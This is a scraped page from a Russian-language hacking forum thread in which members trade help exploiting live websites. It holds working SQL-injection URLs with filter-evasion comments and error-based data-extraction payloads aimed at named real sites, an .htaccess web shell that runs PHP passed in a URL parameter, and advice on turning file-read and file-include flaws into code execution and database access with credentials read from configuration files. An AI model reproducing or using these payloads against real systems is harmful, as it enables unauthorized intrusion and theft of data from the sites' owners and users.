Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Why does vulnerable number not showing?

    Code:
    http://safariestate.com.pk/details.php?id=-964 /*!uNiOn*/ /*!all*/ /*!SeleCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://safariestate.com.pk/details.php?id=964+and+false+/*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+
     
    _________________________
    1 person likes this.
  3. infoseller

    infoseller Member

    Joined:
    17 Aug 2011
    Messages:
    136
    Likes Received:
    13
    Reputations:
    0
    Code:
    http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&Itemid=55&type=0&cnid=0&stid=0&maxbed=&sold=0&featured=0&custom4=&custom5=&custom6=&custom7=&custom8=&pets=0&lug=&direction=DESCPRICE&min_squarefeet=&max_squarefeet=&postcode=&radius=&keyword=%27%2F*&cid=0&locid=0&minprice=&maxprice=&minbed=&bathrooms=&parking=&submit=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA
    Можно ли раскрутить? и как?
     
    #18643 infoseller, 17 Dec 2011
    Last edited by a moderator: 17 Dec 2011
  4. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    66
    Reputations:
    34
    Привет,
    есть ли возможность узнать имя фотографии или атача на форуме vbulletin 3.8.4?
    Что интересного можно узнать, если есть возможность читать файлы. конфиг смотрел, бд локальная, пма немогу найти.
    ПС
    Дайте ссылку на пхпмайадмина хостинга infobox.ru
     
  5. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    скорее всего в твоем случае vbulletin хранит фотографии в базе а не в фс.
    как вариант можешь попробовать подключится с теми данными что ты прочитал в конфиге к 3306 порту (дефолтный порт mysql)
     
    _________________________
  6. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    wkar, тебе надо имя загруженного файла на сервере или имя файла, которое у него было на локальном компе во время загрузки на сервер?
    У тебя на компе картинка с аватара лежит(ала) в файле o4ad.gif
     
  7. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    66
    Reputations:
    34
    Пробовал, не подключается, 61 ошибка.
    ПС
    хмм, я что-то забыл что можно инклюдить сессии%) Сейчас попробую:)

    2M_script, название файла не сервере, чтоб в дальнейшем его инклюдить.
     
  8. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Так у тебя читалка или инклуд?
     
    _________________________
  9. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    66
    Reputations:
    34
    в одно скрипте читалка, в другом инклуд.
     
  10. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    http://help.infobox.ru/11-23
    Но что то не открывается этот поддомен.
     
    1 person likes this.
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Ну раз инклуд есть, то вариантов много, сессии, логи, временные файлы.
     
    _________________________
    1 person likes this.
  12. SecondLife

    SecondLife Elder - Старейшина

    Joined:
    8 May 2011
    Messages:
    30
    Likes Received:
    21
    Reputations:
    21
    Встретился интересный случай: есть возможность создать в папке файл .htaccess, но проблема в том, что в этой папке больше вообще ничего нет и создать в ней больше ничего невозможно.

    Апач файл обрабатывает, но что в него можно написать? Интересует заливка шелла/выполнение PHP команд/чтение файлов.

    Директивы логирования не доступны на уровне настроек, да и mod_rewrite не читаем файлы сам, а создаёт подзапрос, тем самым обламывая попытку использовать флаги вроде engine off.
     
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    914
    Reputations:
    363
    Code:
    SELECT * FROM db WHERE bd1 like '%+order+by+10%00%'
    мой запрос в кавычках, как от этого избавиться?
     
    _________________________
  14. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html

    создаешь .htaccess с таким содержимым:
    Code:
    <Files ~ "^\.ht">
    Order allow,deny
    Allow from all
    </Files>
    AddType application/x-httpd-php .htaccess
    #<?php eval($_GET['e']);?>
    и вызываешь так: site.com/.htaccess?e=phpinfo();


    нужно как минимум поставить одинарную кавычку:
    SELECT * FROM db WHERE bd1 like '%' order by 100#'
     
    _________________________
    #18654 Expl0ited, 18 Dec 2011
    Last edited: 18 Dec 2011
    2 people like this.
  15. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Например так
    Code:
    http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&keyword=1')/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)or/**/('1
     
    2 people like this.
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    914
    Reputations:
    363
    Expl0ited, спасибо
    запрос схавал, правда реакции нет
    http://www.usvieda.org/search.php
    уязвимо поле поиска.
     
    _________________________
  17. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    слоит 'and(select(max(1))from(information_schema.columns)group by(concat(version(),0x00,floor(rand(0)*2))))#
     
    _________________________
    2 people like this.
  18. Breetonia

    Breetonia New Member

    Joined:
    11 Dec 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    Как можно выбрать данные из бд mysql,в имени которой стоит точка ? Сервер ведь интерпретирует вторую половину имени бд как имя таблицы,а не имя бд,поэтому запросы и не проходят ( сиптом получил все таблицы в бд,а с содержимым - облом )
     
  19. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    SELECT * FROM `database`.`table.name`
     
    _________________________
  20. Breetonia

    Breetonia New Member

    Joined:
    11 Dec 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    хех,это замечательно,но в браузере такое не прокатит ведь.Я имел ввиду,что из браузера пытаюсь обратиться к скрипту таким образом,а не из phpMyAdmin или другого клиента.
     
Thread Status:
Not open for further replies.